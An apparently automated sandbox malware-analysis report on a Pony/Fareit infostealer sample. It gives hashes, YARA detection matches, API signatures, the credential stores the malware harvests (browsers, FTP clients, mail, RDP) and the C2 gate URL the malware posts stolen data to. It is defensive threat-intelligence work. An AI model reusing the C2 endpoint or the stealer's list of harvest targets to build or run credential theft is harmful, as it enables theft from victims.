Edit tour

Windows Analysis Report
820.exe

Overview

General Information

Sample name:	820.exe (renamed file extension from none to exe)
Original sample name:	820
Analysis ID:	1428492
MD5:	f318a9ad5a22eb8b1a0849d82b171cc6
SHA1:	4206d66d1279f24097aeec8184dc3dd22cc6513a
SHA256:	820b7ea29750ecab25b85ef56f24d42b51b332b404e594ee55cdff2bc63097df
Infos:

Detection

Pony

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Yara detected Pony

C2 URLs / IPs found in malware configuration

Drops / launches Pony Loader self-deletion script - malware possibly based on Pony Loader leaked source code

Machine Learning detection for sample

Pony trojan / infostealer detected

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Yara detected aPLib compressed binary

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to query locales information (e.g. system language)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found evasive API chain (may stop execution after accessing registry keys)

Found evasive API chain checking for process token information

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Yara signature match

Classification

Process Tree

System is w10x64

820.exe (PID: 7324 cmdline: "C:\Users\user\Desktop\820.exe" MD5: F318A9AD5A22EB8B1A0849D82B171CC6)

cmd.exe (PID: 7420 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\6575781.bat" "C:\Users\user\Desktop\820.exe" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
EvilPony, Ponyshe	Privately modded version of the Pony stealer.	No Attribution	https://threatpost.com/docusign-phishing-campaign-includes-hancitor-downloader/125724/	https://malpedia.caad.fkie.fraunhofer.de/details/win.evilpony

Malware Configuration

Threatname: Pony

{"C2 list": ["http://assuredexpresscourierservice.com/ponzy/Panelnew/gate.php"]}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
820.exe	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
820.exe	JoeSecurity_Pony	Yara detected Pony	Joe Security
820.exe	Windows_Trojan_Pony_d5516fe8	unknown	unknown	0x1443f:$a1: \Global Downloader 0x13bc8:$a2: wiseftpsrvs.bin 0x1429f:$a3: SiteServer %d\SFTP 0x14293:$a4: %s\Keychain 0x144fd:$a5: Connections.txt 0x14844:$a6: ftpshell.fsi 0x14f9f:$a7: inetcomm server passwords
820.exe	pony	Identify Pony	Brian Wallace @botnet_hunter	0x12dca:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x14fe6:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x125ec:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x12c0d:$s3: POST %s HTTP/1.0 0x12c36:$s4: Accept-Encoding: identity, ;q=0 0x12d43:$s4: Accept-Encoding: identity, ;q=0
820.exe	Fareit	Fareit Payload	kevoreilly	0x1523d:$string1: 0D 0A 09 09 0D 0A 0D 0A 09 20 20 20 3A 6B 74 6B 20 20 20 0D 0A 0D 0A 0D 0A 20 20 20 20 20 64 65 6C 20 20 20 20 09 20 25 31 20 20 0D 0A 09 69 66 20 20 09 09 20 65 78 69 73 74 20 09 20 20 20 25 ...

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000000.1616594000.0000000000413000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000000.1616612816.0000000000414000.00000008.00000001.01000000.00000003.sdmp	JoeSecurity_Pony	Yara detected Pony	Joe Security
00000000.00000000.1616612816.0000000000414000.00000008.00000001.01000000.00000003.sdmp	Windows_Trojan_Pony_d5516fe8	unknown	unknown	0x263f:$a1: \Global Downloader 0x1dc8:$a2: wiseftpsrvs.bin 0x249f:$a3: SiteServer %d\SFTP 0x2493:$a4: %s\Keychain 0x26fd:$a5: Connections.txt 0x2a44:$a6: ftpshell.fsi 0x319f:$a7: inetcomm server passwords
00000000.00000000.1616612816.0000000000414000.00000008.00000001.01000000.00000003.sdmp	pony	Identify Pony	Brian Wallace @botnet_hunter	0xfca:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x31e6:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x7ec:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0xe0d:$s3: POST %s HTTP/1.0 0xe36:$s4: Accept-Encoding: identity, ;q=0 0xf43:$s4: Accept-Encoding: identity, ;q=0
00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmp	JoeSecurity_Pony	Yara detected Pony	Joe Security
00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmp	Windows_Trojan_Pony_d5516fe8	unknown	unknown	0x263f:$a1: \Global Downloader 0x1dc8:$a2: wiseftpsrvs.bin 0x249f:$a3: SiteServer %d\SFTP 0x2493:$a4: %s\Keychain 0x26fd:$a5: Connections.txt 0x2a44:$a6: ftpshell.fsi 0x319f:$a7: inetcomm server passwords
00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmp	pony	Identify Pony	Brian Wallace @botnet_hunter	0xfca:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x31e6:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x7ec:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0xe0d:$s3: POST %s HTTP/1.0 0xe36:$s4: Accept-Encoding: identity, ;q=0 0xf43:$s4: Accept-Encoding: identity, ;q=0
Process Memory Space: 820.exe PID: 7324	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: 820.exe PID: 7324	JoeSecurity_Pony	Yara detected Pony	Joe Security
Process Memory Space: 820.exe PID: 7324	Windows_Trojan_Pony_d5516fe8	unknown	unknown	0x4ba6:$a1: \Global Downloader 0x2132b:$a1: \Global Downloader 0x4026:$a2: wiseftpsrvs.bin 0x20752:$a2: wiseftpsrvs.bin 0x4a61:$a3: SiteServer %d\SFTP 0x211e6:$a3: SiteServer %d\SFTP 0x4a55:$a4: %s\Keychain 0x211da:$a4: %s\Keychain 0x4c5a:$a5: Connections.txt 0x213df:$a5: Connections.txt 0x53b9:$a6: ftpshell.fsi 0x21ac3:$a6: ftpshell.fsi 0x5ac9:$a7: inetcomm server passwords 0x221d3:$a7: inetcomm server passwords
Process Memory Space: 820.exe PID: 7324	pony	Identify Pony	Brian Wallace @botnet_hunter	0x2568:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x3309:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x63be:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x1ec94:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x1fa35:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x22ac8:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x1517:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x1c24:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x1dc3e:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x1e34b:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x2449:$s3: POST %s HTTP/1.0 0x32af:$s3: POST %s HTTP/1.0 0x1eb75:$s3: POST %s HTTP/1.0 0x1f9db:$s3: POST %s HTTP/1.0 0x2472:$s4: Accept-Encoding: identity, ;q=0 0x1eb9e:$s4: Accept-Encoding: identity, ;q=0
Click to see the 7 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.820.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.820.exe.400000.0.unpack	JoeSecurity_Pony	Yara detected Pony	Joe Security
0.2.820.exe.400000.0.unpack	Windows_Trojan_Pony_d5516fe8	unknown	unknown	0x1523f:$a1: \Global Downloader 0x149c8:$a2: wiseftpsrvs.bin 0x1509f:$a3: SiteServer %d\SFTP 0x15093:$a4: %s\Keychain 0x152fd:$a5: Connections.txt 0x15644:$a6: ftpshell.fsi 0x15d9f:$a7: inetcomm server passwords
0.2.820.exe.400000.0.unpack	pony	Identify Pony	Brian Wallace @botnet_hunter	0x13bca:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x15de6:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x133ec:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x13a0d:$s3: POST %s HTTP/1.0 0x13a36:$s4: Accept-Encoding: identity, ;q=0 0x13b43:$s4: Accept-Encoding: identity, ;q=0
0.2.820.exe.400000.0.unpack	Fareit	Fareit Payload	kevoreilly	0x1603d:$string1: 0D 0A 09 09 0D 0A 0D 0A 09 20 20 20 3A 6B 74 6B 20 20 20 0D 0A 0D 0A 0D 0A 20 20 20 20 20 64 65 6C 20 20 20 20 09 20 25 31 20 20 0D 0A 09 69 66 20 20 09 09 20 65 78 69 73 74 20 09 20 20 20 25 ...
0.0.820.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.0.820.exe.400000.0.unpack	JoeSecurity_Pony	Yara detected Pony	Joe Security
0.0.820.exe.400000.0.unpack	Windows_Trojan_Pony_d5516fe8	unknown	unknown	0x1523f:$a1: \Global Downloader 0x149c8:$a2: wiseftpsrvs.bin 0x1509f:$a3: SiteServer %d\SFTP 0x15093:$a4: %s\Keychain 0x152fd:$a5: Connections.txt 0x15644:$a6: ftpshell.fsi 0x15d9f:$a7: inetcomm server passwords
0.0.820.exe.400000.0.unpack	pony	Identify Pony	Brian Wallace @botnet_hunter	0x13bca:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x15de6:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x133ec:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x13a0d:$s3: POST %s HTTP/1.0 0x13a36:$s4: Accept-Encoding: identity, ;q=0 0x13b43:$s4: Accept-Encoding: identity, ;q=0
0.0.820.exe.400000.0.unpack	Fareit	Fareit Payload	kevoreilly	0x1603d:$string1: 0D 0A 09 09 0D 0A 0D 0A 09 20 20 20 3A 6B 74 6B 20 20 20 0D 0A 0D 0A 0D 0A 20 20 20 20 20 64 65 6C 20 20 20 20 09 20 25 31 20 20 0D 0A 09 69 66 20 20 09 09 20 65 78 69 73 74 20 09 20 20 20 25 ...
Click to see the 5 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 820.exe

Avira: detected

Found malware configuration

Source: 0.0.820.exe.400000.0.unpack

Malware Configuration Extractor: Pony {"C2 list": ["http://assuredexpresscourierservice.com/ponzy/Panelnew/gate.php"]}

Multi AV Scanner detection for domain / URL

Source: assuredexpresscourierservice.com

Virustotal: Detection: 7%

Perma Link

Multi AV Scanner detection for submitted file

Source: 820.exe	ReversingLabs: Detection: 100%
Source: 820.exe	Virustotal: Detection: 87%			Perma Link

Yara detected Pony

Source: Yara match	File source: 820.exe, type: SAMPLE
Source: Yara match	File source: 0.2.820.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.820.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1616612816.0000000000414000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 820.exe PID: 7324, type: MEMORYSTR

Machine Learning detection for sample

Source: 820.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\820.exe	Code function: 0_2_0040A67C lstrlenW,wsprintfA,wsprintfA,lstrlenW,CryptUnprotectData,LocalFree,	0_2_0040A67C
Source: C:\Users\user\Desktop\820.exe	Code function: 0_2_0040D328 CertOpenSystemStoreA,CertEnumCertificatesInStore,lstrcmp,lstrcmp,CryptAcquireCertificatePrivateKey,CryptGetUserKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CertCloseStore,	0_2_0040D328
Source: C:\Users\user\Desktop\820.exe	Code function: 0_2_0040A4C1 WideCharToMultiByte,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,CryptUnprotectData,LocalFree,757283B0,	0_2_0040A4C1
Source: C:\Users\user\Desktop\820.exe	Code function: 0_2_0040A8D7 CredEnumerateA,lstrlenW,CryptUnprotectData,LocalFree,CredFree,	0_2_0040A8D7
Source: C:\Users\user\Desktop\820.exe	Code function: 0_2_0040CDA7 lstrlen,CryptUnprotectData,LocalFree,	0_2_0040CDA7
Source: C:\Users\user\Desktop\820.exe	Code function: 0_2_0040AA8E lstrlen,CryptUnprotectData,LocalFree,	0_2_0040AA8E
Source: C:\Users\user\Desktop\820.exe	Code function: 0_2_00404346 CryptUnprotectData,LocalFree,	0_2_00404346
Source: C:\Users\user\Desktop\820.exe	Code function: 0_2_0040BBA0 CryptUnprotectData,LocalFree,lstrlen,StrCmpNIA,lstrlen,StrCmpNIA,lstrlen,StrCmpNIA,	0_2_0040BBA0

Source: 820.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\Desktop\820.exe	Code function: 0_2_0040514D FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose,	0_2_0040514D
Source: C:\Users\user\Desktop\820.exe	Code function: 0_2_00404110 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,	0_2_00404110
Source: C:\Users\user\Desktop\820.exe	Code function: 0_2_00404DDD FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose,	0_2_00404DDD
Source: C:\Users\user\Desktop\820.exe	Code function: 0_2_00408A4F FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,	0_2_00408A4F
Source: C:\Users\user\Desktop\820.exe	Code function: 0_2_004088CB FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,	0_2_004088CB
Source: C:\Users\user\Desktop\820.exe	Code function: 0_2_0040979C FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlen,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,	0_2_0040979C

Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://assuredexpresscourierservice.com/ponzy/Panelnew/gate.php

Source: unknown

DNS traffic detected: query: assuredexpresscourierservice.com replaycode: Name error (3)

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: 820.exe, 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: ?%02XSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: 820.exe	String found in binary or memory: ?%02XSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2http://www.facebook.com/abe2869f-9b47-4cd9-a358-c22904dba7f7Microsoft_WinInet_ftp://Software\Adobe\CommonSiteServersSiteServer %d\HostSiteServer %d\WebUrlSiteServer %d\Remote DirectorySiteServer %d-UserSiteServer %d-User PW%s\KeychainSiteServer %d\SFTPDeluxeFTPsites.xmlWeb DataLogin DataSQLite format 3table() CONSTRAINTPRIMARYUNIQUECHECKFOREIGNloginsorigin_urlpassword_valueusername_valueftp://http://https://\Google\Chrome\Chromium\ChromePlusSoftware\ChromePlusInstall_Dir\Bromium\Nichrome\Comodo\RockMeltK-Meleon\K-Meleon\ProfilesEpic\Epic\EpicStaff-FTPsites.ini\Sites\Visicom Media.ftpSettings\Global DownloaderSM.archFreshFTP.SMFBlazeFtpsite.datLastPasswordLastAddressLastUserLastPortSoftware\FlashPeak\BlazeFtp\Settings\BlazeFtp.fplFTP++.Link\shell\open\commandGoFTPConnections.txt3D-FTPsites.ini\3D-FTP\SiteDesignerSOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32EasyFTP\NetSarang.xfp.rdpTERMSRV/password 51:b:username:s:full address:s:.TERMSRV/FTP NowFTPNowsites.xmlSOFTWARE\Robo-FTP 3.7\ScriptsSOFTWARE\Robo-FTP 3.7\FTPServersFTP CountFTP File%dPasswordServerNameUserIDInitialDirectoryPortNumberServerType equals www.facebook.com (Facebook)
Source: 820.exe	String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)

Source: unknown

DNS traffic detected: queries for: assuredexpresscourierservice.com

Source: 820.exe	String found in binary or memory: ftp://http://https://ftp.fireFTPsites.datSeaMonkey
Source: 820.exe	String found in binary or memory: http://assuredexpresscourierservice.com/ponzy/Panelnew/gate.php
Source: 820.exe	String found in binary or memory: http://assuredexpresscourierservice.com/ponzy/Panelnew/gate.phphttp://assuredexpresscourierservice.c
Source: 820.exe	String found in binary or memory: http://https://ftp://operawand.dat_Software
Source: 820.exe	String found in binary or memory: http://www.ibsensoftware.com/
Source: 820.exe, 00000000.00000003.1620871035.00000000006F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 820.exe, 00000000.00000003.1620871035.00000000006F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 820.exe, 00000000.00000003.1620871035.00000000006F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 820.exe, 00000000.00000003.1620871035.00000000006F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 820.exe, 00000000.00000003.1620871035.00000000006F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 820.exe, 00000000.00000003.1620871035.00000000006F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 820.exe, 00000000.00000003.1620871035.00000000006F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 820.exe, 00000000.00000002.1635331357.000000000068E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: 820.exe, 00000000.00000002.1635331357.000000000068E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: 820.exe, 00000000.00000003.1620871035.00000000006F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: 820.exe, 00000000.00000003.1620871035.00000000006F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

E-Banking Fraud

Yara detected Pony

Source: Yara match	File source: 820.exe, type: SAMPLE
Source: Yara match	File source: 0.2.820.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.820.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1616612816.0000000000414000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 820.exe PID: 7324, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 820.exe, type: SAMPLE	Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: 820.exe, type: SAMPLE	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 820.exe, type: SAMPLE	Matched rule: Fareit Payload Author: kevoreilly
Source: 0.2.820.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: 0.2.820.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 0.2.820.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Fareit Payload Author: kevoreilly
Source: 0.0.820.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: 0.0.820.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 0.0.820.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Fareit Payload Author: kevoreilly
Source: 00000000.00000000.1616612816.0000000000414000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: 00000000.00000000.1616612816.0000000000414000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: Process Memory Space: 820.exe PID: 7324, type: MEMORYSTR	Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: Process Memory Space: 820.exe PID: 7324, type: MEMORYSTR	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter

Pony trojan / infostealer detected

Source: Signatures Results

: All Signatures

Source: C:\Users\user\Desktop\820.exe	Code function: 0_2_00412009		0_2_00412009
Source: C:\Users\user\Desktop\820.exe	Code function: 0_2_00402E67		0_2_00402E67

Source: C:\Users\user\Desktop\820.exe	Code function: String function: 00401CF9 appears 139 times
Source: C:\Users\user\Desktop\820.exe	Code function: String function: 0041062E appears 42 times
Source: C:\Users\user\Desktop\820.exe	Code function: String function: 004042BB appears 51 times

Source: 820.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 820.exe, type: SAMPLE	Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: 820.exe, type: SAMPLE	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 820.exe, type: SAMPLE	Matched rule: Fareit author = kevoreilly, description = Fareit Payload, cape_type = Fareit Payload
Source: 0.2.820.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: 0.2.820.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 0.2.820.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Fareit author = kevoreilly, description = Fareit Payload, cape_type = Fareit Payload
Source: 0.0.820.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: 0.0.820.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 0.0.820.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Fareit author = kevoreilly, description = Fareit Payload, cape_type = Fareit Payload
Source: 00000000.00000000.1616612816.0000000000414000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: 00000000.00000000.1616612816.0000000000414000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: Process Memory Space: 820.exe PID: 7324, type: MEMORYSTR	Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: Process Memory Space: 820.exe PID: 7324, type: MEMORYSTR	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net

Source: classification engine

